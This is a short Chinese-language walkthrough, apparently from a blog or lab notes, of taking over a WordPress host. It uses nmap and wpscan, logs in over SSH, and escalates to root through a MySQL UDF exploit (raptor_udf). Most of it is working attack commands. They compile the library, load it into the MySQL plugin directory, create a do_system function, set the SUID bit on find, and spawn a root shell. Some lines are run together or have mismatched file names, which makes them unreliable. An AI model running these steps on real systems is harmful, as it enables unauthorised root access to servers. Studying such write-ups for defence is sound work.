mysql提权
Namp 扫描ip端口
Cms 探测 wpscan kali 工具
Wpscan 扫描出来用户名。用用户名登陆ssh
而后利用mysql UDF提权。html
1.gcc -g -c raptor_udf.c 编译一下下载的c文件
2.gcc -g -shared -Wl,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
3.登陆mysql
4.Create table foo(line blob);
5.scp raptor_udf2.so michael@192.168.111.136:/var/www/html/wordpress/
6.第五步是用来传递文件到目标服务器上的
7.Insertintofoovalues(load_file('/var/www/html/wordpress/raptor_udf5.so'));
8.select * from foo into dumpfile '/usr/lib/mysql/plugin/aaa.so';
9.create function do_system returns integer soname 'aaa.so';
10.select do_system('id > /tmp/out; chown michael.michael /tmp/out');
11.!Sh
12.cat /tmp/out
13.加载 select do_system('chmod u+s /usr/bin/find');
14.而后推出mysql 直接用mysql
touch foosql
find foo -exec 'whoami' ;
find foo -exec 'id' ;
find foo -exec '/bin/sh' ;服务器
就是root权限ssh
- 1. MySQL提权篇
- 2. MYSQL-提权
- 3. [提权]mysql中的UDF提权
- 4. Mysql udf /Mix 提权
- 5. MYSQL提权方法
- 6. linux mysql udf 提权
- 7. mysql grant提示无权限
- 8. MySQL利用日志提权
- 9. Mysql udf提权(Linux平台)
- 10. Mysql数据库—UDF提权
- 更多相关文章...
- • MySQL用户授权(GRANT) - MySQL教程
- • Rust 所有权 - RUST 教程
- • 漫谈MySQL的锁机制
- • SpringBoot中properties文件不能自动提示解决方法
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. MySQL提权篇
- 2. MYSQL-提权
- 3. [提权]mysql中的UDF提权
- 4. Mysql udf /Mix 提权
- 5. MYSQL提权方法
- 6. linux mysql udf 提权
- 7. mysql grant提示无权限
- 8. MySQL利用日志提权
- 9. Mysql udf提权(Linux平台)
- 10. Mysql数据库—UDF提权